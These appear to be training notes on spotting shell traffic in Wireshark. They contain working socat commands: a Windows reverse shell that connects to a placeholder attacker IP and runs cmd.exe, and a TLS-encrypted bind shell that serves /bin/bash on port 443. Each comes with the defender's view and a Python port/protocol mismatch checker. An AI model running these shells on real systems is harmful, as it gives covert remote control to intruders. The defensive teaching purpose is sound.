Wireshark and Encrypted Traffic

Scenario 1: Unencrypted Reverse Shell over Port 22

Objective:

Create a reverse shell with socat over port 22 (the port normally used for SSH) to simulate a connection that could fool a defender who trusts the port number rather than the protocol actually running on it.

Commands:

Kali Linux (Attacker's Listener):

socat -d -d TCP-LISTEN:22 STDOUT

Explanation:

  • -d -d: Enables verbose/debug output (each -d raises the log level).

  • TCP-LISTEN:22: Listens on TCP port 22; binding a port below 1024 requires root.

  • STDOUT: Writes received data to the screen.

Windows Victim (Reverse Shell):

socat.exe TCP:<attacker-ip>:22 EXEC:'cmd.exe',pipes

Explanation:

  • Connects back to the attacker on port 22.

  • Executes cmd.exe and pipes its input/output over the connection, without any encryption.


Defender's View (Wireshark):

  • Traffic on port 22 is expected to be SSH: a cleartext version banner exchange (SSH-2.0-...) followed by key exchange and then encrypted packets.

  • Here there is no SSH banner at all; Follow TCP Stream shows the whole session in cleartext, revealing:

    • Command inputs

    • Responses

    • Any passwords typed into the session

🔴 Red Flag: Cleartext data on port 22 is suspicious: a port/protocol mismatch.


Scenario 2: Encrypted Bind Shell over Port 443

Objective:

Use an OpenSSL-encrypted bind shell that mimics HTTPS traffic (port 443).

Generate a Self-signed Certificate:

openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 365 -out bind_shell.crt

Combine the key and certificate into one PEM file (socat's cert= option expects the private key in the same file unless a separate key= option is given; writing the output to a new file avoids truncating an input):

cat bind_shell.key bind_shell.crt > bind_shell.pem

Commands:

Host (Target machine with bind shell):

socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash

Explanation:

  • OPENSSL-LISTEN:443: Listens on port 443 and wraps the connection in SSL/TLS.

  • cert=bind_shell.pem: Uses the combined certificate and private key for the TLS handshake.

  • verify=0: Does not require or verify a client certificate.

  • EXEC:/bin/bash: Binds the shell to the connection.

  • fork: Forks a child process per connection so the listener keeps accepting new clients.

Attacker (Kali):

socat OPENSSL:<target-ip>:443,verify=0 STDIO

Connects to the encrypted bind shell; verify=0 skips verification of the self-signed certificate, so the connection is encrypted but not authenticated.


Defender's View (Wireshark):

  • Traffic on port 443 appears to be a legitimate TLS (HTTPS) session: Wireshark dissects a normal handshake.

  • Application data is encrypted, so the commands and responses are hidden; only the handshake is visible, including the self-signed certificate in TLS 1.2 and below.

This is stealthier and much harder for defenders to inspect from packet content alone; detection has to rely on handshake metadata (self-signed certificate, missing SNI) and connection behaviour rather than payload.
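As an added example that is not part of the course or these notes, the check below scores flows from both scenarios the way a defender would: it looks at the first payload bytes in each direction and flags a port whose traffic does not start the way the expected protocol does. The Flow class, the sample addresses and the payload bytes are constructed for illustration; the two port-22 flows and the port-443 flow mirror the scenarios above.

```python
# Added example (not from the course): flag TCP flows whose first payload
# bytes do not match the protocol the destination port implies.
from dataclasses import dataclass

@dataclass
class Flow:
    """One TCP conversation, as seen via Wireshark's Follow TCP Stream."""
    client: str
    server: str
    dport: int
    client_first: bytes   # first payload bytes the client sent
    server_first: bytes   # first payload bytes the server sent

def looks_like_ssh(payload: bytes) -> bool:
    # RFC 4253: each side opens with an identification string "SSH-2.0-..."
    return payload.startswith(b"SSH-")

def looks_like_tls(payload: bytes) -> bool:
    # TLS record header: type 0x16 (handshake), version 0x03 0x0{0..4}, 2-byte length
    return (len(payload) >= 5 and payload[0] == 0x16
            and payload[1] == 0x03 and payload[2] <= 0x04)

# Expected protocol per well-known port; both directions must conform
EXPECTED = {22: ("SSH", looks_like_ssh), 443: ("TLS", looks_like_tls)}

def classify(flow: Flow) -> str:
    """Return 'CONFORMS', 'MISMATCH' or 'UNKNOWN_PORT' for one flow."""
    if flow.dport not in EXPECTED:
        return "UNKNOWN_PORT"
    _, check = EXPECTED[flow.dport]
    if check(flow.client_first) and check(flow.server_first):
        return "CONFORMS"
    return "MISMATCH"

# Constructed sample flows mirroring the two scenarios (addresses are made up)
REVERSE_SHELL_22 = Flow("10.0.0.5", "10.0.0.9", 22,
    client_first=b"Microsoft Windows [Version 10.0]\r\n",   # cmd.exe banner in cleartext
    server_first=b"whoami\r\n")                           # attacker's first command
REAL_SSH_22 = Flow("10.0.0.5", "10.0.0.9", 22,
    client_first=b"SSH-2.0-OpenSSH_9.2\r\n", server_first=b"SSH-2.0-OpenSSH_9.2\r\n")
BIND_SHELL_443 = Flow("10.0.0.9", "10.0.0.7", 443,
    client_first=b"\x16\x03\x01\x00\xf4\x01" + b"\x00" * 10,   # ClientHello record
    server_first=b"\x16\x03\x03\x00\x5a\x02" + b"\x00" * 10)   # ServerHello record

def report(flows):
    """Per-flow verdicts; the TLS bind shell conforms, so payload checks alone won't catch it."""
    return [(f.client, f.server, f.dport, classify(f)) for f in flows]
```

The port-22 reverse shell is flagged as a mismatch while the TLS bind shell passes, which is exactly the gap the second scenario exploits.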

Practicals
